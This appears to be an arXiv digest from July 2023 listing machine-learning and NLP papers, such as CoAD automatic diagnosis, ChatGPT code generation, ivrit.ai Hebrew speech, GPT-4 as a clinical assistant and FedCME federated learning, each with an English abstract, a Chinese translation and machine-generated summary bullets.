    摘要 \textsc{Lara} 是一种键值代数,旨在通过三类操作抽象统一线性代数与关系代数。对 \textsc{Lara} 表达能力的研究表明,它能够表示关系代数以及大多数线性代数运算;然而,矩阵求逆、行列式等若干关键计算无法在 \textsc{Lara} 中表达,\textsc{Lara} 也无法表示全局计算和迭代计算。本文提出 \textsc{IterLara},在 \textsc{Lara} 的基础上扩展迭代算子,以提供一个统一大数据、人工智能、科学计算和数据库等通用计算操作的代数模型。我们研究了 \textsc{Lara} 与 \textsc{IterLara} 的表达能力,证明带聚合函数的 \textsc{IterLara} 可以表示矩阵求逆与行列式;并进一步证明,不限制函数功能的 \textsc{IterLara} 是图灵完备的。我们还提出操作计数(Operation Count,OP)作为 \textsc{IterLara} 的计算量度量,并确认 OP 度量与现有计算度量一致。

CoAD: Automatic Diagnosis through Symptom and Disease Collaborative Generation

  • paper_url: http://arxiv.org/abs/2307.08290
  • repo_url: https://github.com/kwanwaichung/coad
  • paper_authors: Huimin Wang, Wai-Chung Kwan, Kam-Fai Wong, Yefeng Zheng
  • for: 该研究旨在提高自动诊断(AD)的精度,以帮助医生更加精确地诊断疾病。
  • methods: 该方法使用 Transformer 架构,以症状序列作为输入,通过自回归方式进行预测,并利用最后一个症状的隐状态判断疾病。
  • results: 该研究获得了2.3%的提升,与前一代最佳结果相比。
    Abstract Automatic diagnosis (AD), a critical application of AI in healthcare, employs machine learning techniques to assist doctors in gathering patient symptom information for precise disease diagnosis. The Transformer-based method utilizes an input symptom sequence, predicts itself through auto-regression, and employs the hidden state of the final symptom to determine the disease. Despite its simplicity and superior performance demonstrated, a decline in disease diagnosis accuracy is observed caused by 1) a mismatch between symptoms observed during training and generation, and 2) the effect of different symptom orders on disease prediction. To address the above obstacles, we introduce the CoAD, a novel disease and symptom collaborative generation framework, which incorporates several key innovations to improve AD: 1) aligning sentence-level disease labels with multiple possible symptom inquiry steps to bridge the gap between training and generation; 2) expanding symptom labels for each sub-sequence of symptoms to enhance annotation and eliminate the effect of symptom order; 3) developing a repeated symptom input schema to effectively and efficiently learn the expanded disease and symptom labels. We evaluate the CoAD framework using four datasets, including three public and one private, and demonstrate that it achieves an average 2.3% improvement over previous state-of-the-art results in automatic disease diagnosis. For reproducibility, we release the code and data at https://github.com/KwanWaiChung/coad.
    摘要 自动诊断(AD)是人工智能在医疗领域的一项关键应用,它利用机器学习技术帮助医生收集患者症状信息,以实现精准的疾病诊断。基于 Transformer 的方法以症状序列为输入,通过自回归方式进行预测,并利用最后一个症状的隐状态来判断疾病。尽管这一方法简单且表现优异,但仍观察到诊断准确率的下降,原因在于:(1) 训练阶段与生成阶段观察到的症状不匹配;(2) 症状顺序不同会影响疾病预测。为解决上述问题,我们提出 CoAD——一种新的疾病与症状协同生成框架,其关键创新包括:(1) 将句子级疾病标签与多个可能的症状询问步骤对齐,以弥合训练与生成之间的差距;(2) 为每个症状子序列扩展症状标签,以加强标注并消除症状顺序的影响;(3) 设计重复症状输入模式,以高效地学习扩展后的疾病与症状标签。我们在四个数据集(三个公开、一个私有)上评估 CoAD 框架,结果表明其在自动疾病诊断上比此前的最优结果平均提升 2.3%。为便于复现,代码与数据发布于 https://github.com/KwanWaiChung/coad。

Automated Action Model Acquisition from Narrative Texts

  • paper_url: http://arxiv.org/abs/2307.10247
  • repo_url: None
  • paper_authors: Ruiqi Li, Leyang Cui, Songtuan Lin, Patrik Haslum
  • for: 本研究旨在提高人工智能代理人的决策能力,通过自动从叙述文本中提取结构化事件和生成 планинг语言风格的动作模型。
  • methods: 本研究使用了自动从叙述文本中提取结构化事件的方法,并基于预测常识事件关系、文本矛盾和相似性,生成了 планинг语言风格的动作模型。
  • results: 实验结果显示,NaRuto可以在经典叙述规划领域中生成高质量的动作模型,与现有的完全自动方法相当,甚至与半自动方法相当。
    Abstract Action models, which take the form of precondition/effect axioms, facilitate causal and motivational connections between actions for AI agents. Action model acquisition has been identified as a bottleneck in the application of planning technology, especially within narrative planning. Acquiring action models from narrative texts in an automated way is essential, but challenging because of the inherent complexities of such texts. We present NaRuto, a system that extracts structured events from narrative text and subsequently generates planning-language-style action models based on predictions of commonsense event relations, as well as textual contradictions and similarities, in an unsupervised manner. Experimental results in classical narrative planning domains show that NaRuto can generate action models of significantly better quality than existing fully automated methods, and even on par with those of semi-automated methods.
    摘要 行动模型以前置条件/效果公理的形式,为 AI 智能体在行动之间建立因果与动机联系。行动模型的获取被认为是规划技术应用中的瓶颈,在叙事规划中尤为突出。从叙事文本中自动获取行动模型十分必要,但由于这类文本固有的复杂性,这项工作颇具挑战。我们提出 NaRuto 系统:它从叙事文本中抽取结构化事件,并基于对常识事件关系、文本矛盾与相似性的预测,以无监督方式生成规划语言风格的行动模型。在经典叙事规划领域上的实验结果表明,NaRuto 生成的行动模型质量显著优于现有的全自动方法,甚至可与半自动方法相媲美。

ChatGPT is Good but Bing Chat is Better for Vietnamese Students

  • paper_url: http://arxiv.org/abs/2307.08272
  • repo_url: None
  • paper_authors: Xuan-Quy Dao, Ngoc-Bich Le
  • for: 这个研究旨在探讨两个现代大语言模型(LLMs),即ChatGPT和Microsoft Bing Chat(BingChat),在越南学生的需求下是否有效。
  • methods: 我们进行了这两个LLMs在不同学科中的比较分析,包括数学、文学、英语、物理、化学、生物、历史、地理和公民教育等。
  • results: 我们的研究结果表明,BingChat在各种学科中表现出色,只有文学领域是ChatGPT表现得更好。此外,BingChat使用了更高级的GPT-4技术,而ChatGPT是基于GPT-3.5技术。这使得BingChat可以提高其理解、判断和创造性文本生成能力。此外,BingChat在越南可用并具有内置的链接和参考,这也为其superiority做出了贡献。
    Abstract This study examines the efficacy of two SOTA large language models (LLMs), namely ChatGPT and Microsoft Bing Chat (BingChat), in catering to the needs of Vietnamese students. Although ChatGPT exhibits proficiency in multiple disciplines, Bing Chat emerges as the more advantageous option. We conduct a comparative analysis of their academic achievements in various disciplines, encompassing mathematics, literature, English language, physics, chemistry, biology, history, geography, and civic education. The results of our study suggest that BingChat demonstrates superior performance compared to ChatGPT across a wide range of subjects, with the exception of literature, where ChatGPT exhibits better performance. Additionally, BingChat utilizes the more advanced GPT-4 technology in contrast to ChatGPT, which is built upon GPT-3.5. This allows BingChat to improve to comprehension, reasoning and generation of creative and informative text. Moreover, the fact that BingChat is accessible in Vietnam and its integration of hyperlinks and citations within responses serve to reinforce its superiority. In our analysis, it is evident that while ChatGPT exhibits praiseworthy qualities, BingChat presents a more apdated solutions for Vietnamese students.
    摘要 本研究考察了两种最先进的大语言模型(LLM)——ChatGPT 与 Microsoft Bing Chat(BingChat)——能否满足越南学生的需求。虽然 ChatGPT 在多个学科中表现出色,但 BingChat 是更具优势的选择。我们对二者在数学、文学、英语、物理、化学、生物、历史、地理和公民教育等学科上的学业表现进行了比较分析。结果表明,除文学外(ChatGPT 在该学科表现更好),BingChat 在其余学科中的表现均优于 ChatGPT。此外,BingChat 采用更先进的 GPT-4 技术,而 ChatGPT 基于 GPT-3.5,这使 BingChat 在理解、推理以及生成富有创造性和信息量的文本方面更强。BingChat 在越南可用,且其回答中内置超链接与引用,也进一步强化了它的优势。总体而言,ChatGPT 具备值得称赞的品质,但 BingChat 为越南学生提供了更合适的解决方案。

Extending the Frontier of ChatGPT: Code Generation and Debugging

  • paper_url: http://arxiv.org/abs/2307.08260
  • repo_url: None
  • paper_authors: Fardin Ahsan Sakib, Saadat Hasan Khan, A. H. M. Rezaul Karim
  • for: 这篇论文旨在研究 ChatGPT 是否可以解决编程问题,并评估其解决问题的正确性和效率。
  • methods: 该论文使用 ChatGPT 解决 Leetcode 上的编程问题,并对其解决的问题进行了评估。
  • results: 论文发现,ChatGPT 的总成功率为 71.875%,表明它可以成功解决大多数编程问题。它在结构化问题上表现出了优异,但在接受反馈改进解决方案时表现不佳。
    Abstract Large-scale language models (LLMs) have emerged as a groundbreaking innovation in the realm of question-answering and conversational agents. These models, leveraging different deep learning architectures such as Transformers, are trained on vast corpora to predict sentences based on given queries. Among these LLMs, ChatGPT, developed by OpenAI, has ushered in a new era by utilizing artificial intelligence (AI) to tackle diverse problem domains, ranging from composing essays and biographies to solving intricate mathematical integrals. The versatile applications enabled by ChatGPT offer immense value to users. However, assessing the performance of ChatGPT's output poses a challenge, particularly in scenarios where queries lack clear objective criteria for correctness. For instance, evaluating the quality of generated essays becomes arduous and relies heavily on manual labor, in stark contrast to evaluating solutions to well-defined, closed-ended questions such as mathematical problems. This research paper delves into the efficacy of ChatGPT in solving programming problems, examining both the correctness and the efficiency of its solution in terms of time and memory complexity. The research reveals a commendable overall success rate of 71.875\%, denoting the proportion of problems for which ChatGPT was able to provide correct solutions that successfully satisfied all the test cases present in Leetcode. It exhibits strengths in structured problems and shows a linear correlation between its success rate and problem acceptance rates. However, it struggles to improve solutions based on feedback, pointing to potential shortcomings in debugging tasks. These findings provide a compact yet insightful glimpse into ChatGPT's capabilities and areas for improvement.
    摘要 大规模语言模型(LLM)已成为问答与对话智能体领域的一项突破性创新。这些模型利用 Transformer 等不同的深度学习架构,在庞大语料上训练,以根据给定查询预测文本。其中,由 OpenAI 开发的 ChatGPT 借助人工智能应对了从撰写文章和传记到求解复杂数学积分等多种问题领域,为用户带来了巨大价值。然而,评估 ChatGPT 输出的质量存在挑战,尤其是在查询缺乏明确客观正确性标准的情况下。例如,评估生成文章的质量十分困难,严重依赖人工劳动,这与评估数学题等定义明确的封闭式问题形成鲜明对比。本研究考察了 ChatGPT 求解编程问题的能力,从解答的正确性以及时间和内存复杂度两方面进行评估。研究发现,ChatGPT 的总体成功率为 71.875%,即其解答能够通过 Leetcode 全部测试用例的题目比例。它在结构化问题上表现突出,且成功率与题目的通过率呈线性相关;但它难以根据反馈改进解答,表明其在调试类任务上可能存在不足。这些发现为了解 ChatGPT 的能力与改进空间提供了简洁而深入的视角。

PAT: Parallel Attention Transformer for Visual Question Answering in Vietnamese

  • paper_url: http://arxiv.org/abs/2307.08247
  • repo_url: None
  • paper_authors: Nghia Hieu Nguyen, Kiet Van Nguyen
  • for: 本文提出了一种新的多模态学习方法,称为并行注意机制。
  • methods: 本文提出了一种新的语言特征提取模块,即层次语言特征提取器(Hierarchical Linguistic Features Extractor),以及一种基于Transformer架构的并行注意机制(Parallel Attention Transformer,PAT)。
  • results: 根据本文的实验结果,PAT在ViVQA数据集上达到了所有基准值和其他SOTA方法(包括SAAA和MCAN)的最高准确率。
    Abstract We present in this paper a novel scheme for multimodal learning named the Parallel Attention mechanism. In addition, to take into account the advantages of grammar and context in Vietnamese, we propose the Hierarchical Linguistic Features Extractor instead of using an LSTM network to extract linguistic features. Based on these two novel modules, we introduce the Parallel Attention Transformer (PAT), achieving the best accuracy compared to all baselines on the benchmark ViVQA dataset and other SOTA methods including SAAA and MCAN.
    摘要 我们在这篇论文中提出了一种新的多模态学习方案,称为并行注意机制。此外,为了利用越南语语法和上下文的优势,我们提议使用层次语言特征提取器代替 LSTM 网络来提取语言特征。基于这两个新模块,我们提出了并行注意变换器(PAT),在 ViVQA 基准数据集上取得了优于所有基线以及 SAAA、MCAN 等其他 SOTA 方法的最高准确率。

ivrit.ai: A Comprehensive Dataset of Hebrew Speech for AI Research and Development

  • paper_url: http://arxiv.org/abs/2307.08720
  • repo_url: https://github.com/yairl/ivrit.ai
  • paper_authors: Yanir Marmor, Kinneret Misgav, Yair Lifshitz
  • for: 提高希伯来语自动语音识别技术的研究和开发
  • methods: 使用大量希伯来语语音数据,以三种形式提供(原始音频、经语音活动检测处理后的音频、部分转录数据),以满足不同研究需求
  • results: 提供了大规模、多样化的希伯来语语音数据资源,可以帮助研究人员、开发者和商业机构提升希伯来语自动语音识别技术的水平
    Abstract We introduce "ivrit.ai", a comprehensive Hebrew speech dataset, addressing the distinct lack of extensive, high-quality resources for advancing Automated Speech Recognition (ASR) technology in Hebrew. With over 3,300 speech hours and over a thousand diverse speakers, ivrit.ai offers a substantial compilation of Hebrew speech across various contexts. It is delivered in three forms to cater to varying research needs: raw unprocessed audio, data post-Voice Activity Detection, and partially transcribed data. The dataset stands out for its legal accessibility, permitting use at no cost, thereby serving as a crucial resource for researchers, developers, and commercial entities. ivrit.ai opens up numerous applications, offering vast potential to enhance AI capabilities in Hebrew. Future efforts aim to expand ivrit.ai further, thereby advancing Hebrew's standing in AI research and technology.
    摘要 我们介绍“ivrit.ai”,一个全面的希伯来语语音数据集,旨在弥补推进希伯来语自动语音识别(ASR)技术所需的大规模高质量资源的缺乏。ivrit.ai 包含超过 3,300 小时的语音和上千名多样化的说话人,涵盖多种场景下的希伯来语语音。该数据集以三种形式提供,以适应不同的研究需求:原始未处理的音频、经语音活动检测处理后的数据,以及部分转录的数据。该数据集在法律上可以免费获取和使用,因此是研究人员、开发者和商业机构的重要资源。ivrit.ai 开启了众多应用,为提升希伯来语的人工智能能力提供了巨大潜力。未来的工作将进一步扩展 ivrit.ai,从而提升希伯来语在人工智能研究与技术中的地位。

BASS: Block-wise Adaptation for Speech Summarization

  • paper_url: http://arxiv.org/abs/2307.08217
  • repo_url: None
  • paper_authors: Roshan Sharma, Kenneth Zheng, Siddhant Arora, Shinji Watanabe, Rita Singh, Bhiksha Raj
  • for: 提高端到端语音摘要模型的性能,解决训练时间过长导致模型质量下降的问题。
  • methods: 采用块式训练方法,通过分割输入序列进行逐步训练,使模型能够在很长的输入序列上进行学习。
  • results: 在 How2 数据集上,所提出的块式训练方法在 ROUGE-L 上比截断输入基线高出 3 个绝对点。
    Abstract End-to-end speech summarization has been shown to improve performance over cascade baselines. However, such models are difficult to train on very large inputs (dozens of minutes or hours) owing to compute restrictions and are hence trained with truncated model inputs. Truncation leads to poorer models, and a solution to this problem rests in block-wise modeling, i.e., processing a portion of the input frames at a time. In this paper, we develop a method that allows one to train summarization models on very long sequences in an incremental manner. Speech summarization is realized as a streaming process, where hypothesis summaries are updated every block based on new acoustic information. We devise and test strategies to pass semantic context across the blocks. Experiments on the How2 dataset demonstrate that the proposed block-wise training method improves by 3 points absolute on ROUGE-L over a truncated input baseline.
    摘要 端到端语音摘要已被证明能够超越级联基线的性能。然而,这类模型由于计算限制难以在非常长的输入(数十分钟乃至数小时)上训练,因而通常使用截断后的输入进行训练。截断会导致模型变差,解决这一问题的思路在于块式建模,即一次只处理输入帧的一部分。本文提出了一种能够以增量方式在超长序列上训练摘要模型的方法:将语音摘要视为流式过程,每处理一个块就基于新的声学信息更新假设摘要。我们设计并测试了在块之间传递语义上下文的策略。在 How2 数据集上的实验表明,所提出的块式训练方法在 ROUGE-L 上比截断输入基线高出 3 个绝对点。
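
The abstract describes processing a long acoustic input one block at a time while carrying context forward and updating the hypothesis summary per block. The sketch below illustrates that general pattern only; the module sizes, GRU-based architecture, and how context is passed are illustrative assumptions, not the authors' BASS model.

```python
# Minimal sketch of block-wise processing for long-input summarization.
import torch
import torch.nn as nn

class BlockwiseSummarizer(nn.Module):
    def __init__(self, feat_dim=80, hidden=256, vocab=1000, block_frames=500):
        super().__init__()
        self.block_frames = block_frames
        self.encoder = nn.GRU(feat_dim, hidden, batch_first=True)
        self.decoder = nn.GRU(hidden, hidden, batch_first=True)
        self.out = nn.Linear(hidden, vocab)

    def forward(self, acoustic_feats):
        # acoustic_feats: (batch, frames, feat_dim); process one block at a time,
        # passing the encoder's final state across blocks as semantic context.
        context = None
        logits_per_block = []
        for start in range(0, acoustic_feats.size(1), self.block_frames):
            block = acoustic_feats[:, start:start + self.block_frames]
            enc_out, context = self.encoder(block, context)  # carry context forward
            # Update the hypothesis summary from everything seen so far.
            dec_out, _ = self.decoder(enc_out.mean(dim=1, keepdim=True))
            logits_per_block.append(self.out(dec_out))
        return logits_per_block  # one (refined) hypothesis per block

feats = torch.randn(2, 1600, 80)           # ~1600 frames of 80-dim filterbanks
hypotheses = BlockwiseSummarizer()(feats)  # incremental summaries, one per block
print(len(hypotheses), hypotheses[0].shape)
```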

Analyzing Dataset Annotation Quality Management in the Wild

  • paper_url: http://arxiv.org/abs/2307.08153
  • repo_url: None
  • paper_authors: Jan-Christoph Klie, Richard Eckart de Castilho, Iryna Gurevych
  • for: 这些论文的目的是要研究数据质量对机器学习模型训练和评估的影响,以及现有数据集中是否存在错误注释、偏见或注释 artifacts。
  • methods: 本文首先综述并总结了文献中关于数据集创建质量管理的推荐做法,并就如何应用这些建议给出提示;随后编译了一个由 591 篇介绍文本数据集的科学论文组成的语料,并对其进行了质量管理相关方面的标注。
  • results: 分析发现,大多数被标注的论文采用了良好或非常良好的质量管理,但约 30% 的工作质量管理欠佳;分析还揭示了一些常见错误,尤其是在使用标注者间一致性和计算标注错误率时。
    Abstract Data quality is crucial for training accurate, unbiased, and trustworthy machine learning models and their correct evaluation. Recent works, however, have shown that even popular datasets used to train and evaluate state-of-the-art models contain a non-negligible amount of erroneous annotations, bias or annotation artifacts. There exist best practices and guidelines regarding annotation projects. But to the best of our knowledge, no large-scale analysis has been performed as of yet on how quality management is actually conducted when creating natural language datasets and whether these recommendations are followed. Therefore, we first survey and summarize recommended quality management practices for dataset creation as described in the literature and provide suggestions on how to apply them. Then, we compile a corpus of 591 scientific publications introducing text datasets and annotate it for quality-related aspects, such as annotator management, agreement, adjudication or data validation. Using these annotations, we then analyze how quality management is conducted in practice. We find that a majority of the annotated publications apply good or very good quality management. However, we deem the effort of 30% of the works as only subpar. Our analysis also shows common errors, especially with using inter-annotator agreement and computing annotation error rates.
    摘要 数据质量对训练准确、无偏且可信的机器学习模型及其正确评估至关重要。然而,近期研究表明,即使是用于训练和评估最先进模型的常用数据集,也包含不可忽视的错误标注、偏见或标注痕迹。关于标注项目已有最佳实践和指南,但据我们所知,迄今尚无大规模分析考察在创建自然语言数据集时质量管理究竟是如何进行的、这些建议是否得到遵循。因此,我们首先综述并总结文献中推荐的数据集创建质量管理做法,并就如何应用给出建议;随后编译了一个由 591 篇介绍文本数据集的科学论文组成的语料,并就质量相关方面(如标注者管理、一致性、仲裁或数据验证)进行标注。基于这些标注,我们分析了质量管理在实践中的执行情况。我们发现大多数被标注的论文采用了良好或非常良好的质量管理,但约 30% 的工作仅达到欠佳水平。分析还揭示了一些常见错误,尤其是在使用标注者间一致性和计算标注错误率时。
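
Since the paper flags common mistakes in computing inter-annotator agreement, a small illustration of the usual recommendation: report a chance-corrected coefficient such as Cohen's kappa rather than raw percent agreement. The labels below are made up; only the metric comparison is the point.

```python
# Raw percent agreement vs. a chance-corrected coefficient (Cohen's kappa).
from sklearn.metrics import cohen_kappa_score

annotator_a = ["pos", "pos", "neg", "neg", "pos", "neg", "pos", "pos"]
annotator_b = ["pos", "neg", "neg", "neg", "pos", "neg", "pos", "neg"]

raw_agreement = sum(a == b for a, b in zip(annotator_a, annotator_b)) / len(annotator_a)
kappa = cohen_kappa_score(annotator_a, annotator_b)

# Raw agreement ignores chance agreement; kappa corrects for it and is usually lower.
print(f"raw agreement = {raw_agreement:.2f}, Cohen's kappa = {kappa:.2f}")
```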

The Potential and Pitfalls of using a Large Language Model such as ChatGPT or GPT-4 as a Clinical Assistant

  • paper_url: http://arxiv.org/abs/2307.08152
  • repo_url: None
  • paper_authors: Jingqing Zhang, Kai Sun, Akshay Jagadeesh, Mahta Ghahfarokhi, Deepa Gupta, Ashok Gupta, Vibhor Gupta, Yike Guo
  • for: 这两篇研究用于评估ChatGPT和GPT-4在实际医疗数据库中的表现,以及它们在诊断助理方面的使用可行性。
  • methods: 这两篇研究使用了ChatGPT和GPT-4,分别在实际医疗数据库中进行了医疗诊断和诊断助理任务。
  • results: GPT-4 在疾病分类任务中的 F1 分数最高可达 96%,但模型有时会给出与事实不符的陈述、遗漏关键的医疗发现,并建议不必要的检查和过度治疗。这些问题加上医疗数据隐私方面的顾虑,使这些模型目前不适合实际临床应用。
    Abstract Recent studies have demonstrated promising performance of ChatGPT and GPT-4 on several medical domain tasks. However, none have assessed its performance using a large-scale real-world electronic health record database, nor have evaluated its utility in providing clinical diagnostic assistance for patients across a full range of disease presentation. We performed two analyses using ChatGPT and GPT-4, one to identify patients with specific medical diagnoses using a real-world large electronic health record database and the other, in providing diagnostic assistance to healthcare workers in the prospective evaluation of hypothetical patients. Our results show that GPT-4 across disease classification tasks with chain of thought and few-shot prompting can achieve performance as high as 96% F1 scores. For patient assessment, GPT-4 can accurately diagnose three out of four times. However, there were mentions of factually incorrect statements, overlooking crucial medical findings, recommendations for unnecessary investigations and overtreatment. These issues coupled with privacy concerns, make these models currently inadequate for real world clinical use. However, limited data and time needed for prompt engineering in comparison to configuration of conventional machine learning workflows highlight their potential for scalability across healthcare applications.
    摘要 近期研究表明 ChatGPT 和 GPT-4 在多项医疗领域任务上表现出色,但尚无工作基于大规模真实世界电子健康记录数据库评估其性能,也未评估其在覆盖各种疾病表现的患者临床诊断辅助方面的效用。我们使用 ChatGPT 和 GPT-4 进行了两项分析:其一是基于真实世界的大型电子健康记录数据库识别患有特定疾病诊断的患者;其二是在对假设病例的前瞻性评估中为医务人员提供诊断辅助。结果显示,在疾病分类任务中,结合思维链与少样本提示,GPT-4 的 F1 分数最高可达 96%。在患者评估中,GPT-4 大约四次中有三次能够给出准确诊断。然而,模型也会给出与事实不符的陈述、遗漏关键的医疗发现,并建议不必要的检查和过度治疗。这些问题加上隐私方面的顾虑,使这些模型目前尚不适合真实的临床应用。不过,与配置传统机器学习流程相比,提示工程所需的数据和时间都很有限,这凸显了它们在医疗应用中规模化的潜力。

It’s All Relative: Interpretable Models for Scoring Bias in Documents

  • paper_url: http://arxiv.org/abs/2307.08139
  • repo_url: None
  • paper_authors: Aswin Suresh, Chi-Hsuan Wu, Matthias Grossglauser
  • for: 这篇论文的目的是提出一种可解释的模型,用于评分网络文档中的偏见。
  • methods: 这种模型基于布莱德利-泰勒axioms,并通过对同一篇Wikipedia文章的多个修订版本进行比较,以学习偏见的评分。
  • results: 模型可以准确地评分偏见,并且可以解释模型的参数,找到偏见的指标字。此外,模型还在不同的设置下进行了应用,包括研究Wikipedia文章的时间演化、比较新闻来源的偏见、以及评分法律修订的偏见。
    Abstract We propose an interpretable model to score the bias present in web documents, based only on their textual content. Our model incorporates assumptions reminiscent of the Bradley-Terry axioms and is trained on pairs of revisions of the same Wikipedia article, where one version is more biased than the other. While prior approaches based on absolute bias classification have struggled to obtain a high accuracy for the task, we are able to develop a useful model for scoring bias by learning to perform pairwise comparisons of bias accurately. We show that we can interpret the parameters of the trained model to discover the words most indicative of bias. We also apply our model in three different settings - studying the temporal evolution of bias in Wikipedia articles, comparing news sources based on bias, and scoring bias in law amendments. In each case, we demonstrate that the outputs of the model can be explained and validated, even for the two domains that are outside the training-data domain. We also use the model to compare the general level of bias between domains, where we see that legal texts are the least biased and news media are the most biased, with Wikipedia articles in between. Given its high performance, simplicity, interpretability, and wide applicability, we hope the model will be useful for a large community, including Wikipedia and news editors, political and social scientists, and the general public.
    摘要 我们提出一种可解释的模型,用于评分网络文档中的偏见。我们的模型具有布莱德利-泰勒axioms的假设,并基于同一篇Wikipedia文章的修订版本进行训练。而且,我们的模型可以准确地比较修订版本之间的偏见水平。我们表明了我们可以解释模型中学习的参数,以便发现偏见的关键词。此外,我们还应用了我们的模型在三个不同的场景中:研究Wikipedia文章的时间演化、比较新闻来源的偏见水平以及评分法律修订的偏见水平。在每个场景中,我们都能够解释和验证模型的输出结果,包括在训练数据外的两个领域中。此外,我们还使用模型对不同领域的总体偏见水平进行比较,发现法律文档最少偏见,新闻媒体最多偏见,Wikipedia文章处于中间。考虑其高性能、简单、可解释和广泛应用,我们希望这种模型能够为大量社区提供帮助,包括Wikipedia编辑、新闻编辑、政治和社会科学家以及一般公众。
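
The core idea is to learn a scalar bias score from pairwise comparisons of revisions, in the Bradley-Terry spirit. Below is a toy pairwise scorer with a logistic loss on score differences; the bag-of-words features, vocabulary, and training data are invented placeholders, not the paper's setup, and the paper's actual model is richer.

```python
# Minimal Bradley-Terry-style pairwise scorer: learn a scalar bias score
# from pairs (more_biased, less_biased) via a logistic loss on score margins.
import torch

vocab = ["the", "clearly", "allegedly", "terrible", "reported", "great"]
def bow(text):  # bag-of-words features over the toy vocabulary
    toks = text.lower().split()
    return torch.tensor([float(toks.count(w)) for w in vocab])

pairs = [  # (more biased, less biased) toy revision pairs
    ("the policy is clearly terrible", "the policy was criticised"),
    ("a great and terrible decision", "the decision was reported"),
]
X_hi = torch.stack([bow(a) for a, _ in pairs])
X_lo = torch.stack([bow(b) for _, b in pairs])

w = torch.zeros(len(vocab), requires_grad=True)
opt = torch.optim.SGD([w], lr=0.5)
for _ in range(200):
    opt.zero_grad()
    margin = (X_hi - X_lo) @ w          # s(more biased) - s(less biased)
    loss = -torch.nn.functional.logsigmoid(margin).mean()
    loss.backward()
    opt.step()

# Larger learned weights mark words the model treats as indicators of bias.
print(sorted(zip(vocab, w.tolist()), key=lambda t: -t[1]))
```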

cs.LG - 2023-07-17

A Study on the Performance of Generative Pre-trained Transformer (GPT) in Simulating Depressed Individuals on the Standardized Depressive Symptom Scale

  • paper_url: http://arxiv.org/abs/2307.08576
  • repo_url: None
  • paper_authors: Sijin Cai, Nanfeng Zhang, Jiaying Zhu, Yanjie Liu, Yongjin Zhou
  • for: 这篇论文的目的是评估 GPT 技术在抑郁症评估与诊断中的潜力。
  • methods: 论文使用了三种抑郁相关评估工具(HAMD-17、SDS、GDS-15),并在两个实验中用 GPT 模拟抑郁个体和正常个体的作答。
  • results: GPT 在抑郁评估中表现出与正常个体和抑郁个体评分标准相一致的准确性;在不同抑郁严重程度下其表现存在一定差异,且在敏感度较高的量表上表现更好。
    Abstract Background: Depression is a common mental disorder with societal and economic burden. Current diagnosis relies on self-reports and assessment scales, which have reliability issues. Objective approaches are needed for diagnosing depression. Objective: Evaluate the potential of GPT technology in diagnosing depression. Assess its ability to simulate individuals with depression and investigate the influence of depression scales. Methods: Three depression-related assessment tools (HAMD-17, SDS, GDS-15) were used. Two experiments simulated GPT responses to normal individuals and individuals with depression. Compare GPT's responses with expected results, assess its understanding of depressive symptoms, and performance differences under different conditions. Results: GPT's performance in depression assessment was evaluated. It aligned with scoring criteria for both individuals with depression and normal individuals. Some performance differences were observed based on depression severity. GPT performed better on scales with higher sensitivity. Conclusion: GPT accurately simulates individuals with depression and normal individuals during depression-related assessments. Deviations occur when simulating different degrees of depression, limiting understanding of mild and moderate cases. GPT performs better on scales with higher sensitivity, indicating potential for developing more effective depression scales. GPT has important potential in depression assessment, supporting clinicians and patients.
    摘要 背景:抑郁是一种常见的心理疾病,带来社会和经济的负担。现在的诊断仍然基于自我报告和评估工具,这些工具的可靠性存在问题。需要更Objective的方法来诊断抑郁。目标:评估GPT技术在诊断抑郁方面的潜力。判断它能够模拟抑郁症状和调查不同程度的抑郁症状对响应。方法:使用三种抑郁相关的评估工具(HAMD-17、SDS、GDS-15)。进行两个实验,通过GPT对正常人和抑郁人群的响应进行模拟,与预期结果进行比较,评估它对抑郁症状的理解程度和不同情况下的表现差异。结果:GPT在抑郁诊断方面的表现被评估。它与正常人和抑郁人群的评分标准相符。有些情况下,随着抑郁的严重程度不同,GPT的表现会有所不同。GPT在感知度较高的评价工具上表现更好,表明GPT可能有助于开发更有效的抑郁评价工具。结论:GPT可以准确模拟正常人和抑郁人群在抑郁相关评估中的表现,但是在不同程度的抑郁中会出现一些差异。GPT在感知度较高的评价工具上表现更好,表明它可能有助于开发更有效的抑郁评价工具,支持临床医生和患者。

FedCME: Client Matching and Classifier Exchanging to Handle Data Heterogeneity in Federated Learning

  • paper_url: http://arxiv.org/abs/2307.08574
  • repo_url: None
  • paper_authors: Jun Nie, Danyang Xiao, Lei Yang, Weigang Wu
  • for: 本研究的目的是解决 federated learning 中的数据不同性问题,以提高模型的全球性性和性能。
  • methods: 本研究提出了一种新的 federated learning 框架,即 FedCME,通过客户端匹配和分类器交换来解决数据不同性问题。在本方法中,客户端的匹配和分类器交换可以更好地调整本地模型的训练方向,从而缓解本地更新偏移。此外,本研究还提出了一种特征对齐方法来增强特征提取器的训练。
  • results: 实验结果表明,FedCME 比 FedAvg、FedProx、MOON 和 FedRS 在 FMNIST 和 CIFAR10 等常用 federated learning 测试 benchmark 上表现更好,特别在数据不同性的情况下。
    Abstract Data heterogeneity across clients is one of the key challenges in Federated Learning (FL), which may slow down the global model convergence and even weaken global model performance. Most existing approaches tackle the heterogeneity by constraining local model updates through reference to global information provided by the server. This can alleviate the performance degradation on the aggregated global model. Different from existing methods, we focus the information exchange between clients, which could also enhance the effectiveness of local training and lead to generate a high-performance global model. Concretely, we propose a novel FL framework named FedCME by client matching and classifier exchanging. In FedCME, clients with large differences in data distribution will be matched in pairs, and then the corresponding pair of clients will exchange their classifiers at the stage of local training in an intermediate moment. Since the local data determines the local model training direction, our method can correct update direction of classifiers and effectively alleviate local update divergence. Besides, we propose feature alignment to enhance the training of the feature extractor. Experimental results demonstrate that FedCME performs better than FedAvg, FedProx, MOON and FedRS on popular federated learning benchmarks including FMNIST and CIFAR10, in the case where data are heterogeneous.
    摘要 客户端之间的数据异质性是联邦学习(FL)中的关键挑战之一,可能减缓全局模型的收敛,甚至削弱全局模型的性能。现有方法大多通过参考服务器提供的全局信息来约束本地模型更新,从而缓解聚合后全局模型的性能下降。与现有方法不同,我们关注客户端之间的信息交换,这同样可以提升本地训练的有效性,并有助于得到高性能的全局模型。具体而言,我们提出了一种名为 FedCME 的新联邦学习框架,通过客户端匹配与分类器交换来实现:数据分布差异较大的客户端被两两匹配,相应的客户端对在本地训练的中间时刻交换各自的分类器。由于本地数据决定了本地模型的训练方向,该方法能够纠正分类器的更新方向,有效缓解本地更新偏移。此外,我们还提出了特征对齐以加强特征提取器的训练。实验结果表明,在数据异质的情况下,FedCME 在 FMNIST 和 CIFAR10 等常用联邦学习基准上的表现优于 FedAvg、FedProx、MOON 和 FedRS。
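
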